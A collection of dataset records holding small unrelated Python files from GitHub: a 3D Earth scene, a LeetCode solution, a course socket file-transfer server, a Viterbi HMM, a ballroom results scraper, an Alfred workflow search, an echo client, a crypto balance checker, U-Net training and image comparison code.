True\r\nwindow.exit_button.visible = False\r\nwindow.fps_counter.enabled = False\r\nwindow.editor_ui.enabled = False\r\n\r\nfloorcubes = []\r\nfor i in range(-35, 35, 2):\r\n for j in range(-35, 35, 2):\r\n floorcubes.append(\r\n Entity(\r\n model='cube', \r\n collider='box', \r\n texture='grass',\r\n color=color.white,\r\n scale=(2, 2, 2), \r\n position=(i, 0, j)\r\n )\r\n )\r\n\r\ntext = Text(\r\n text=\"Terre | +15°C | G=9,81 m/s² | 150'000'000km du Soleil\",\r\n origin=(0, -18, -10)\r\n)\r\n\r\nAudio(sound_file_name='../sounds/music.mp3', autoplay=True, loop=True)\r\n\r\nplayer = FirstPersonController()\r\n\r\nsky=Sky()\r\n\r\nsun = Entity(\r\n model='sphere',\r\n texture=(\"images/sun.png\"),\r\n position=(-200,50,100),\r\n scale=1.8569333333333333\r\n)\r\n\r\ndef update():\r\n x = player.get_position()\r\n if x[1] < -2:\r\n player.position=(0, 1, 0)\r\n\r\nprint(\"\\033[92m____________________________________________Interstellar Main Theme by Hans Zimmer____________________________________________\\033[0m\")\r\nprint(\"\\033[92m__________________________________________Developed by Gabriel Dovat (www.galtech.ch)____________________________________\\033[0m\")\r\n \r\napp.run()","repo_name":"PlanetariumSimulator/Gravitium-V1","sub_path":"earth.py","file_name":"earth.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31107024272","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\ndef mergeKLists(lists):\n tail = head = ListNode()\n i = 0\n while i < len(lists):\n if lists[i] == None:\n lists.pop(i)\n i -= 1\n i += 1\n while len(lists) != 0:\n s_val = 999999999\n s_index = -1\n for i in range(len(lists)):\n if lists[i].val < s_val:\n s_val, s_index = lists[i].val, i\n tail.next = ListNode(s_val)\n tail = tail.next\n lists[s_index] = lists[s_index].next\n if lists[s_index] == None:\n lists.pop(s_index)\n return head.next","repo_name":"everbolt/leetcode","sub_path":"0023.py","file_name":"0023.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12623913094","text":"#Jonathan Chavarria, Chandler Martin, Jeffrey Carson\r\n#CPE 400 5/2/22\r\n#File Transfer Application Project\r\n#Server Code (RECEIVER)\r\n#Accepts files from the client\r\n#Make sure this file is running first, so it is seen as an available connection.\r\n\r\n# To run:\r\n# python3 server.py (if linux or mac)\r\n# py server.py (if windows)\r\n\r\n\r\n#Transmitted files will be added to current working directory of server.py\r\n\r\nimport socket\r\nimport myChecksumServer\r\nimport threading\r\n\r\n#Gets data from client and performs neccessary operations\r\ndef getFiles(conn, addr):\r\n print(f\"[CONNECTED] {addr} \", flush = True)\r\n length = int(conn.recv(1024).decode())\r\n\r\n #For amount of connections recieved\r\n for i in range(length):\r\n data = conn.recv(1024).decode()\r\n filename, clientchecksum = data.split('bruhmoment')\r\n\r\n try:\r\n #Create file with corresponding name from client\r\n with open(filename, \"wb+\") as file:\r\n\r\n bytes_read = conn.recv(1024)\r\n file.write(bytes_read)\r\n\r\n # Calculate checksum of recieved data, compares to client-side checksum\r\n serverchecksum = myChecksumServer.checksum(bytes_read.decode())\r\n if (serverchecksum != clientchecksum):\r\n print(f\"{filename} experienced corruption while being transferred, try retransmitting\\n\")\r\n\r\n print(f\"[RECEIVED] {filename} \")\r\n except IOError:\r\n print(\"Problem recieving data!\")\r\n\r\n print(f\"[DISCONNECTED] {addr} \", flush = True)\r\n conn.close()\r\n\r\nif __name__ == '__main__':\r\n s = socket.socket()\r\n host = socket.gethostname()\r\n port = 5050\r\n s.bind((host,port))\r\n s.listen(5)\r\n print(host)\r\n print(\"Waiting for any incoming connections ...\")\r\n\r\n while True:\r\n conn, addr = s.accept()\r\n thread = threading.Thread(target=getFiles, args=(conn, addr))\r\n thread.start()","repo_name":"JeffreyCarson/UniversityProjects","sub_path":"File Transfer Project/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2856644143","text":"# %%\nimport numpy as np\n\n\"\"\"隠れマルコフモデル\"\"\"\nclass HMM():\n \"\"\"コンストラクタ\"\"\"\n def __init__(self, A, B, row, data, category):\n # パラメータ\n self._A = A\n self._B = B\n self._row = row\n # データ\n self._data = data\n # ステップ数\n self._step = len(self._data)\n # サイコロの種類数\n self._cat = category\n\n # 前向き確率α(時刻t,カテゴリc)\n self._alpha = None\n # 後ろ向き確率β(時刻t, カテゴリc)\n self._beta = None\n # 時刻tにおける状態st\n self._psi = None\n self._psi_vec = None\n # 確率P(X)\n self._prob_x = None\n # 確率P(xt,st)\n self._prob_xs = None\n \n \"\"\"ビタービアルゴリズム\"\"\"\n def viterbi_algorithm(self):\n # 初期化\n x1 = int(self._data[0])\n self._psi = np.zeros((self._step, self._cat))\n self._psi[0,:] = self._row * self._B[:,x1]\n self._psi_vec = np.zeros((self._step, self._cat))\n self._psi_vec[0,:] += 1\n\n # 再帰的計算\n for t in range(1, self._step):\n xt = int(self._data[t])\n for j in range(self._cat):\n self._psi[t,j] = max(self._psi[t-1,:] * self._A[:,j]) * self._B[j,xt]\n self._psi_vec[t,j] = np.argmax(self._psi[t-1,:] * self._A[:,j]) + 1\n \n print(f\"Ψt(j):\\n{self._psi}\\n\")\n\n print(f\"Ψt(j) Vector:\\n{self._psi_vec}\\n\")\n\n # 確率P(x,s*)\n prob_xs = max(self._psi[self._step-1, :])\n\n print(f\"P(x,s*):\\n{prob_xs}\\n\")\n\n # 終了\n state = np.zeros(self._step)\n n_index = np.argmax(self._psi[self._step-1, :])\n state[self._step-1] = n_index\n\n # 系列の復元\n for t in range(self._step-2, -1, -1):\n n_index = self._psi_vec[t, int(state[t+1])]\n state[t] = n_index\n \n print(f\"状態系列s:{state}\")\n\nif __name__ == '__main__':\n A:list=np.loadtxt('../data/A.txt')\n B:list=np.loadtxt('../data/B.txt')\n row:list=np.loadtxt('../data/row.txt')\n data:list=np.loadtxt('../data/data.txt')\n category:int=3\n\n hmm = HMM(A, B, row, data, category)\n hmm.viterbi_algorithm()\n# %%\n","repo_name":"Haruka-Miyoshi/HMM","sub_path":"src/viterbi/HMM.py","file_name":"HMM.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25185250201","text":"# Contains objects that allow the program to compute YCN and recall percentage\nimport decimal\nimport urllib.request\n\nfrom bs4 import BeautifulSoup\nfrom mechanize import Browser\n\n# From https://www.cs.cmu.edu/~112/notes/cmu_112_graphics.py\n\n\nfrom cmu_112_graphics import *\n\n\n############################## Helper Functions ###############################\n\n# From: https://www.cs.cmu.edu/~112/notes/notes-variables-and-functions.html\ndef roundHalfUp(d):\n # Round to nearest with ties going away from zero\n rounding = decimal.ROUND_HALF_UP\n # See other rounding options here:\n # https://docs.python.org/3/library/decimal.html#rounding-modes\n return int(decimal.Decimal(d).to_integral_value(rounding=rounding))\n\n\nclass Competition(object):\n competitions = dict()\n\n def __init__(self, html, name, dancer):\n self.recallPercentages = dict()\n self.recallPercentagesCalculated = False\n self.dancer = dancer\n self.events = dict()\n self.name = name\n self.html = BeautifulSoup(html, features='html.parser')\n self.getEvents(dancer)\n self.number = None\n self.numberOfPossibleRecalls = dict()\n self.numberOfRecalls = dict()\n Competition.competitions[self.name] = self\n\n def __repr__(self):\n return self.name\n\n def getEvents(self, dancer):\n for link in self.html.find_all('a'):\n evtName = link.string.strip()\n event = Event(link.get('href'), evtName, self.dancer)\n self.events[evtName] = event\n if event.level in dancer.eventsByLevel:\n dancer.eventsByLevel[event.level].append(event)\n else:\n dancer.eventsByLevel[event.level] = [event]\n\n def getResultsTablesForComp(self):\n for eventName in self.events:\n event = self.events[eventName]\n event.getResultsTablesForEvent()\n\n def getRecallPercentagesForComp(self):\n if self.recallPercentagesCalculated:\n return\n\n else:\n for eventName in self.events:\n event = self.events[eventName]\n self.getRecallPercentagesForEvent(event)\n self.calculateRecallPercentages()\n for judge in self.recallPercentages:\n percentage = self.recallPercentages[judge]\n self.recallPercentagesCalculated = True\n\n def getRecallPercentagesForEvent(self, event):\n for heat in event.resultsTables:\n self.getRecallPercentagesForHeat(event, heat)\n\n def getRecallPercentagesForHeat(self, event, heat):\n resultTable = event.resultsTables[heat]\n for judgeIndex in range(len(resultTable[0])):\n judgeNumber = resultTable[0][judgeIndex]\n if judgeNumber.isnumeric():\n if judgeNumber in self.numberOfPossibleRecalls:\n self.numberOfPossibleRecalls[judgeNumber] += 1\n else:\n self.numberOfPossibleRecalls[judgeNumber] = 1\n recall = resultTable[1][judgeIndex]\n if recall:\n if judgeNumber in self.numberOfRecalls:\n self.numberOfRecalls[judgeNumber] += 1\n else:\n self.numberOfRecalls[judgeNumber] = 1\n\n def calculateRecallPercentages(self):\n for judge in self.numberOfPossibleRecalls:\n numPossibleRecalls = self.numberOfPossibleRecalls[judge]\n if judge not in self.numberOfRecalls:\n self.recallPercentages[judge] = 0\n else:\n numRecalls = self.numberOfRecalls[judge]\n recallRate = numRecalls / numPossibleRecalls\n recallPercentage = Competition.convertRateToPercent(recallRate)\n self.recallPercentages[judge] = recallPercentage\n\n @staticmethod\n def convertRateToPercent(rate):\n return roundHalfUp(rate * 100)\n\n\nclass Event(object):\n stdDances = ['V. Waltz', 'Tango', 'Foxtrot', 'Quickstep', 'Waltz']\n smoothDances = ['V. Waltz', 'Tango', 'Foxtrot', 'Waltz']\n latinDances = {'Cha Cha', 'Rumba', 'Jive', 'Samba', 'Paso Doble'}\n rhythmDances = {'Cha Cha', 'Rumba', 'Swing', 'Mambo', 'Bolero'}\n levels = {'Newcomer', 'Bronze', 'Silver', 'Gold'}\n\n def __init__(self, url, eventName, dancer):\n self.dancer = dancer\n self.eventName = eventName\n self.url = url\n content = urllib.request.urlopen(self.url).read()\n self.eventHTML = BeautifulSoup(content, features='html.parser')\n\n self.style = ''\n self.place = 0\n self.dance = []\n self.rounds = 0\n self.level = ''\n self.YCNPoints = 0\n self.resultsTables = dict()\n\n self.getStyleAndDance()\n self.getRounds()\n self.getPlace()\n self.getLevel()\n self.getYCNPoints()\n\n def __repr__(self):\n eventStr = f'Event Name: {self.eventName}'\n eventStr += f'\\n\\tURL: {self.url}'\n eventStr += f'\\n\\tLevel: {self.level}'\n eventStr += f'\\n\\tStyle: {self.style}'\n eventStr += f'\\n\\tDance: {self.dance}'\n eventStr += f'\\n\\tRounds: {self.rounds}'\n eventStr += f'\\n\\tPlace: {self.place}'\n eventStr += f'\\n\\tPoints: {self.YCNPoints}'\n return self.eventName\n\n # gets the tier of each round i.e. quarterfinal, semifinal\n @staticmethod\n def getRoundName(i):\n roundNames = ['Final', 'Semi-Final', 'Quarter-Final']\n if i <= 2:\n return roundNames[i]\n else:\n deno = 2 ** i\n return \"1/\" + str(deno) + \"-Final\"\n\n # Gets the style and dance of the event\n def getStyleAndDance(self):\n if 'Am.' in self.eventName:\n for dance in Event.smoothDances:\n if dance in self.eventName:\n self.dance = [dance]\n self.style = 'Smooth'\n break\n\n for dance in Event.rhythmDances:\n if dance in self.eventName:\n self.dance = [dance]\n self.style = 'Rhythm'\n break\n\n elif 'Intl.' in self.eventName:\n for dance in Event.stdDances:\n if dance in self.eventName:\n self.dance = [dance]\n self.style = 'Standard'\n break\n\n for dance in Event.latinDances:\n if dance in self.eventName:\n self.dance = [dance]\n self.style = 'Latin'\n break\n\n elif 'Standard' in self.eventName:\n self.style = 'Standard'\n\n elif 'Smooth' in self.eventName:\n self.style = 'Smooth'\n\n elif 'Latin' in self.eventName:\n self.style = 'Latin'\n\n elif 'Rhythm' in self.eventName:\n self.style = 'Rhythm'\n\n if self.dance == []:\n self.getDanceFromEventPage()\n\n # goes to the event page to get the dance if the event name doesn't\n # include the dances\n def getDanceFromEventPage(self):\n dances = self.eventHTML.find_all('td', attrs={'class': 'h3'})[0:-1]\n for dance in dances:\n dance = str(dance)\n if self.style == 'Standard':\n for danceName in Event.stdDances:\n if danceName in dance:\n self.dance += [danceName]\n elif self.style == 'Smooth':\n for danceName in Event.smoothDances:\n if danceName in dance:\n self.dance += [danceName]\n elif self.style == 'Latin':\n for danceName in Event.latinDances:\n if danceName in dance:\n self.dance += [danceName]\n elif self.style == 'Rhythm':\n for danceName in Event.rhythmDances:\n if danceName in dance:\n self.dance += [danceName]\n\n # gets the syllabus level for the event\n def getLevel(self):\n for level in Event.levels:\n if level in self.eventName:\n self.level = level\n\n # gets the number of rounds\n def getRounds(self):\n self.rounds = len(self.eventHTML.find_all('option'))\n if self.rounds == 0:\n self.rounds = 1\n\n # gets the final placing of the competitor\n def getPlace(self):\n endIndex = self.eventName.find(')')\n self.place = int(self.eventName[0:endIndex])\n\n # Calculates YCN of each dance\n def getYCNPoints(self):\n if self.rounds == 2:\n if self.place <= 3:\n self.YCNPoints = 4 - self.place\n elif self.rounds > 2:\n if self.place <= 3:\n self.YCNPoints = 4 - self.place\n elif 3 < self.place <= 6:\n self.YCNPoints = 1\n else:\n self.YCNPoints = 0\n\n # gets the number of the couple\n def getCoupleNumber(self, eventPage):\n tableElements = eventPage.find_all('td')\n for element in tableElements:\n linksInTableElements = element.find_all('a')\n for link in linksInTableElements:\n if link.string == self.dancer.fullName:\n self.number = element.previous_sibling.string\n\n # gets all the result tables for the event\n def getResultsTablesForEvent(self):\n maxRound = self.rounds - 1\n for i in range(maxRound, 0, -1):\n roundName = Event.getRoundName(i)\n resultTable = self.getResultTableForRound(i, maxRound)\n if len(resultTable) == 2:\n self.resultsTables[roundName] = resultTable\n\n if resultTable[-1][-1] != 'R':\n break\n\n # navigates to the round page\n def getRoundPage(self, i):\n br = Browser()\n br.addheaders = [('User-agent', 'Firefox')]\n br.open(self.url)\n if i is not None:\n br.select_form(name=\"selectRound\")\n br['selCount'] = [str(i)]\n br.submit()\n else:\n i = 0\n soup = BeautifulSoup(br.response().read(), features='html.parser')\n return soup\n\n # gets result table for the round\n def getResultTableForRound(self, i, maxRound):\n roundPage = self.getRoundPage(i)\n if i == maxRound:\n self.getCoupleNumber(roundPage)\n\n # Consulted: https://stackoverflow.com/questions/23377533/ +\n # python-beautifulsoup-parsing-table\n data = []\n table = roundPage.find('table', attrs={'class': 't1n'})\n rows = table.find_all('tr')\n for rowIndex in range(1, len(rows)):\n columns = []\n row = rows[rowIndex]\n if rowIndex == 1:\n rowElements = row.find_all('td')\n for element in rowElements:\n columns += [element.text.strip()]\n data.append([element for element in columns])\n else:\n rowElements = row.find_all('td')\n competitorNumber = rowElements[0].text.strip()\n if competitorNumber != self.number:\n continue\n for elementIndex in range(len(rowElements)):\n element = rowElements[elementIndex].text.strip()\n columns += [element]\n if columns != []:\n data = Event.truncateExcessData(columns, data)\n return data\n\n @staticmethod\n # removes data for other competitors\n def truncateExcessData(columns, data):\n colsToBeAdded = []\n for i in range(len(data[0])):\n colsToBeAdded.append(columns[i])\n data.append(colsToBeAdded)\n return data\n\n\nclass Dancer(object):\n def __init__(self, firstName, lastName):\n self.firstName = firstName\n self.lastName = lastName\n self.fullName = self.firstName + ' ' + self.lastName\n self.resultsURL = (f'http://results.o2cm.com/individual.asp?' +\n f'szLast={lastName}&szFirst={firstName}')\n self.eventsByLevel = dict(Gold=[], Silver=[], Bronze=[], Newcomer=[])\n self.getCompetitions()\n self.newcomerYCN = dict()\n self.bronzeYCN = dict()\n self.silverYCNs = dict()\n self.goldYCNs = dict()\n self.ycnDict = dict()\n self.createYCNDict(self.newcomerYCN)\n self.createYCNDict(self.bronzeYCN)\n self.createYCNDict(self.silverYCNs)\n self.createYCNDict(self.goldYCNs)\n self.getYCNPoints()\n\n # gets the name of each competition the dancer competed at\n def getCompetitions(self):\n content = urllib.request.urlopen(self.resultsURL).read()\n self.resultsBS = BeautifulSoup(content, features='html.parser')\n results = self.resultsBS.find_all('table')[0]\n self.resultsPageHTML = self.resultsBS.prettify()\n\n self.competitions = []\n self.competitionList = []\n for competition in results.find_all('b'):\n self.competitions.append(competition.string)\n\n for i in range(len(self.competitions)):\n compName = self.competitions[i]\n if i < len(self.competitions) - 1:\n nextCompName = self.competitions[i + 1]\n endIndex = self.resultsPageHTML.find(nextCompName)\n else:\n endIndex = len(self.resultsPageHTML) - 1\n startIndex = self.resultsPageHTML.find(compName)\n compHTML = self.resultsPageHTML[startIndex:endIndex]\n self.competitionList.append(Competition(compHTML, compName, self))\n\n @staticmethod\n # creates the YCN dictionary according to template\n def createYCNDict(d):\n d['Latin'] = dict()\n d['Rhythm'] = dict()\n d['Standard'] = dict()\n d['Smooth'] = dict()\n\n for style in d:\n d[style]['Total'] = 0\n for dance in Event.latinDances:\n d['Latin'][dance] = 0\n for dance in Event.rhythmDances:\n d['Rhythm'][dance] = 0\n for dance in Event.stdDances:\n d['Standard'][dance] = 0\n for dance in Event.smoothDances:\n d['Smooth'][dance] = 0\n\n # gets YCN points for each level\n def getYCNPoints(self):\n self.getYCNForLevel('Gold', self.goldYCNs, None)\n self.getYCNForLevel('Silver', self.silverYCNs, self.goldYCNs)\n self.getYCNForLevel('Bronze', self.bronzeYCN, self.silverYCNs)\n self.getYCNForLevel('Newcomer', self.newcomerYCN, self.bronzeYCN)\n\n self.ycnDict['Newcomer'] = self.newcomerYCN\n self.ycnDict['Bronze'] = self.bronzeYCN\n self.ycnDict['Silver'] = self.silverYCNs\n self.ycnDict['Gold'] = self.goldYCNs\n\n # gets the YCN points for specified level\n def getYCNForLevel(self, level, currYCNDict, prevYCNDict):\n if prevYCNDict is not None:\n for style in prevYCNDict:\n for dance in prevYCNDict[style]:\n currYCNDict[style][dance] = prevYCNDict[style][dance] * 2\n\n for event in self.eventsByLevel[level]:\n for dance in event.dance:\n style = event.style\n if style not in currYCNDict:\n currYCNDict[style] = dict()\n currYCNDict[style]['Total'] = 0\n\n if dance in currYCNDict[style]:\n currYCNDict[style][dance] += event.YCNPoints\n else:\n currYCNDict[style][dance] = event.YCNPoints\n\n currYCNDict[style]['Total'] += event.YCNPoints\n","repo_name":"allincmu/TP112","sub_path":"TP2/ballroom_objects.py","file_name":"ballroom_objects.py","file_ext":"py","file_size_in_byte":15487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72621373283","text":"from xml.sax.saxutils import unescape\nfrom workflow import Workflow3\nfrom docopt import docopt\nimport os\nimport sys\nimport re\nimport plistlib\n\ndef wfFilter(filename):\n args=docopt(__doc__)\n plist = plistlib.readPlist(filename)\n name = plist['name']\n disabled = plist['disabled']\n\n if args.get('-r'):\n field='readme' #'>readme<'\n elif args.get('-a'):\n field='createdby' #'>createdby<'\n elif args.get('-b'):\n field='bundleid' #'>bundleid<'\n elif args.get('-c'):\n field='category' #'>category<'\n\n if disabled:\n return name,False\n elif (not args.get('<keyword>')\n and args.get('-w')):\n return name,True\n else:\n keyword=args.get('<keyword>')\n if keyword in plist[field]:\n return name,True\n else:\n return name,False\n\ndef workflow_subdirectories():\n args=docopt(__doc__)\n if not args.get('--pardir'):\n a_dir=os.path.dirname(os.path.dirname(os.path.abspath('info.plist')))\n else:\n a_dir = args.get('--pardir')\n my_workflows=[]\n for folder in os.listdir(a_dir):\n folderpath=os.path.join(a_dir,folder)\n plistfile = os.path.join(a_dir,folder,'info.plist')\n if os.path.isfile(plistfile):\n name,show=wfFilter(plistfile)\n if show:\n my_workflows.append((name,folderpath))\n return my_workflows\n\n\ndef main(wf):\n args=docopt(__doc__)\n query=args.get('<query>')\n quer=re.compile(query,re.IGNORECASE)\n my_workflows=workflow_subdirectories()\n my_workflows.sort(key=lambda tup: tup[0].lower())\n\n for i in my_workflows:\n if quer.search(i[0]):\n wf.add_item(i[0],\n 'Go to workflow directory in Terminal',\n arg=i[1],\n valid=True,\n icon=i[1]+'/icon.png')\n\n wf.send_feedback()\n\nif __name__==u\"__main__\":\n wf=Workflow3()\n sys.exit(wf.run(main))\n","repo_name":"dieggsy/alfred-workflow-browser","sub_path":"src/workflowsearch.py","file_name":"workflowsearch.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1421316758","text":"# program wyznaczający największy wspólny dzielnik 3 zadanych liczb\r\n\r\ndef nwd(a,b):\r\n while (b>0):\r\n c = a % b\r\n a = b\r\n b = c\r\n return a\r\n\r\ndef main():\r\n l1=40\r\n l2=44\r\n l3=36\r\n print(nwd(nwd(l1,l2),l3))\r\n\r\nif __name__ == \"__main__\": main()","repo_name":"JakubWorek/introduction_to_computer_science_course","sub_path":"CW1/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12799341500","text":"import os\nimport sys\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom unetModel import *\nfrom keras import backend as keras\nfrom keras.callbacks import ModelCheckpoint\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nnp.random.seed(int(sys.argv[1]))\n\n\n\ndef read(id,prefix,dir):\n\n\tx = np.asarray(Image.open(dir + prefix + id),dtype=np.float32)\n\tx = (x-x.min())/(x.max()-x.min())\n\treturn np.reshape(x,[256,256,1])\n\n\ndef get_data(ids, img_dir, lbl_dir,bs):\n\ti = 0\n\timg = []\n\tmask = []\n\trandom.shuffle(ids)\n\tfor id in ids:\n\t\timg.append(read(id, 'image_original_' ,img_dir))\n\t\tmask.append(read(id, '_groundtruth_(1)_image_' ,lbl_dir))\n\t\ti = (i + 1)%bs\n\t\tif i == 0 :\n\t\t\tyield (np.array(img),np.array(mask))\n\t\t\timg = [] \n\t\t\tmask = []\n\t\t\ti = 0\n\n\ndef get_test_data(ids,img_dir):\n\timg = None\n\tfor id in ids:\n\t\timg = read(id,'image_original_',img_dir)\n\t\tyield np.reshape(img,[1,256,256,1])\n\t\timg = None\n\ndef train(net,n_epochs=50,batch_size=2,train_percent=0.9,save_ckpt=True) :\n\n\timg_dir = 'data/train_images/' \n\tlbl_dir = 'data/train_labels/' \n\n\timg_list = [f[15:] for f in os.listdir(img_dir)]\n\tids = img_list\n\tbs = 2\n\ttrain_ids = ids[:int(train_percent*len(ids))]\n\ttest_ids = ids[int(train_percent*len(ids)):]\n\n\tmodel_checkpoint = ModelCheckpoint('unet_modified_dice.hdf5', monitor='loss',verbose=1)\n\tnet.fit_generator(get_data(train_ids,img_dir,lbl_dir,bs),steps_per_epoch=50,epochs=1,callbacks=[model_checkpoint])\n\t\nif __name__ == '__main__' :\n\t# net = unet()\n\tnet = load_model('unet_modified_dice.hdf5')\n\ttrain(net)","repo_name":"Meet001/Image-Segmentation-using-Deep-Neural-Network","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33012275946","text":"import logging\nimport pandas as pd\nimport requests\nimport sys\nimport os\n\nsys.path.append(os.getcwd())\n\nlogging.basicConfig(format='%(asctime)s [Get Holiday Data] %(message)s')\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom src.utils.config import config\n\ndataset = config['dataset']\n\nclass HolidayScrapper:\n\n url_template = \"https://excelnotes.com/holidays-indonesia-{}/\"\n\n def __init__(self, year, path) -> None:\n self.year = year\n self.url = self.url_template.format(self.year)\n self.path = path.format(year)\n\n def create_dataset(self) -> pd.DataFrame:\n logger.info(\"Start process\")\n try:\n content = self.get_web_content()\n data = self.get_holiday_data(content)\n formatted_data = self.reformat_data(data)\n dataset = self.save_dataset(formatted_data)\n logger.info(\"Finish process\")\n return dataset\n except Exception as e:\n logger.info(\"ERROR: {} - {}\".format(e.__class__.__name__, str(e)))\n return None\n\n def get_web_content(self) -> str:\n page = requests.get(self.url)\n logger.info(\"Finish get web content\")\n return page.content\n \n def get_holiday_data(self, content) -> list:\n parsed_content = BeautifulSoup(content, \"html.parser\")\n holiday_data = parsed_content.find(\"table\")\n result = [\n self.extract_row(row) for row in holiday_data.find_all(\"tr\") if \"Note\" not in row.text\n ]\n logger.info(\"Finish get holiday data\")\n return result\n \n def extract_row(self, data) -> list:\n all_columns = data.find_all(\"td\")\n result = [all_columns[i].text for i in range(2)]\n return result\n \n def reformat_data(self, data) -> list:\n result = [\n [row[0], self.change_date_format(row[1])] for row in data\n ]\n logger.info(\"Finish reformat data\")\n return result\n \n def change_date_format(self, data) -> datetime:\n old_format = '%b %d, %Y'\n new_format = '%Y-%m-%d %H:%M:%S.%f'\n converted_data = datetime.strptime(data, old_format)\n return datetime.strptime(\n datetime.strftime(converted_data, new_format), \n new_format\n )\n \n def save_dataset(self, data) -> pd.DataFrame:\n columns = [\n \"holiday\",\n \"date\"\n ]\n df = pd.DataFrame(data=data, columns=columns)\n df.to_parquet(self.path, \n index=False, compression=\"gzip\")\n logger.info(\"Finish save data\")\n return df\n","repo_name":"GibranBrahmanta/DSLS-MiniProject-DataScientist","sub_path":"src/data/holiday_data.py","file_name":"holiday_data.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24618243868","text":"\"\"\"\nsudo tcpdump -i lo -nn -XX\n\"\"\"\n\nimport argparse\nimport socket\nimport time\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument('--host',\n\t\t\ttype=str,\n default='127.0.0.1',\n\t\t\thelp='Host.')\n parser.add_argument('--port',\n\t\t\ttype=int,\n default=8001,\n\t\t\thelp='Port.')\n parser.add_argument('--server_host',\n\t\t\ttype=str,\n default='127.0.0.1',\n\t\t\thelp='Server host.')\n parser.add_argument('--server_port',\n\t\t\ttype=int,\n default=8000,\n\t\t\thelp='Server port.')\n args = parser.parse_args()\n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind((args.host, args.port))\n s.connect((args.server_host, args.server_port))\n\n msg = b'PINGPING'\n s.sendall(msg)\n print(f'Sent {msg}.')\n\n msg = s.recv(1024)\n print(f'Received {msg}.')\n\nif __name__ == '__main__':\n main()\n","repo_name":"mwhittaker/port_collision","sub_path":"echo_client.py","file_name":"echo_client.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1456867675","text":"import requests \nimport json\nimport time\n\ndef get_balance(wallet, selected_chains):\n url = f\"https://api.zerion.io/v1/wallets/{wallet}/portfolio/?currency=usd\"\n\n headers = {\n \"accept\": \"application/json\",\n \"authorization\": \"\" # Check https://developers.zerion.io/\n }\n\n response = requests.get(url, headers=headers)\n parsed_data = json.loads(response.text)\n try:\n balances = parsed_data['data']['attributes']['positions_distribution_by_chain']\n except KeyError:\n return 0\n \n total_balance = sum(balances.values())\n \n print(f\"Баланс кошелька {wallet}:\")\n for chain in selected_chains:\n if chain in balances:\n print(f' {chain}: {balances[chain]} USD')\n else:\n print(f\" {chain}: нет данных\")\n print(f'Общий баланс кошелька {total_balance} USD\\n')\n return total_balance\n \n \n\ntotal_balance_of_all_wallets = 0\n\nif __name__ == '__main__':\n selected_chains = input('Введите сети через запятую, в которых вы хотите узнать баланс: ').split(',')\n print()\n with open('wallets.txt', 'r', encoding='utf-8') as file:\n for wallet in file: \n total_balance_of_all_wallets += get_balance(wallet.strip(), selected_chains)\n time.sleep(1)\n\n print(f'Общий баланс всех кошельков: {total_balance_of_all_wallets}') ","repo_name":"MorS1337/wallet-checker","sub_path":"balance_checker.py","file_name":"balance_checker.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23027084656","text":"from skimage.measure import compare_ssim\nimport argparse\nimport imutils\nimport cv2 as cv2\n\nclass ImageComparison(object):\n\n def __init__(self):\n pass\n\n def compare_images(self, imageA, imageB, DifferenceImage):\n\n # load the two input images using openCV\n imageA = cv2.imread(imageA)\n imageB = cv2.imread(imageB)\n\n # convert the images to grayscale\n grayA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)\n grayB = cv2.cvtColor(imageB, cv2.COLOR_BGR2GRAY)\n\n (score, diff) = compare_ssim(grayA, grayB, full=True)\n diff = (diff * 255).astype(\"uint8\")\n # print(\"SSIM: {}\".format(score))\n\n # threshold the difference image, followed by finding contours to\n # obtain the regions of the two input images that differ\n thresh = cv2.threshold(diff, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n\n # loop over the contours\n for c in cnts:\n # compute the bounding box of the contour and then draw the\n # bounding box on both input images to represent where the two\n # images differ\n (x, y, w, h) = cv2.boundingRect(c)\n cv2.rectangle(imageA, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv2.rectangle(imageB, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n # save the differance highlighted image `DifferenceImage`\n # cv2.imwrite(DifferenceImage, imageB)\n # show the output images\n cv2.imshow(\"Original\", imageA)\n cv2.imshow(\"Modified\", imageB)\n # cv2.imshow(\"Diff\", diff)\n # cv2.imshow(\"Thresh\", thresh)\n cv2.waitKey(0)\n\n \n# # Test the 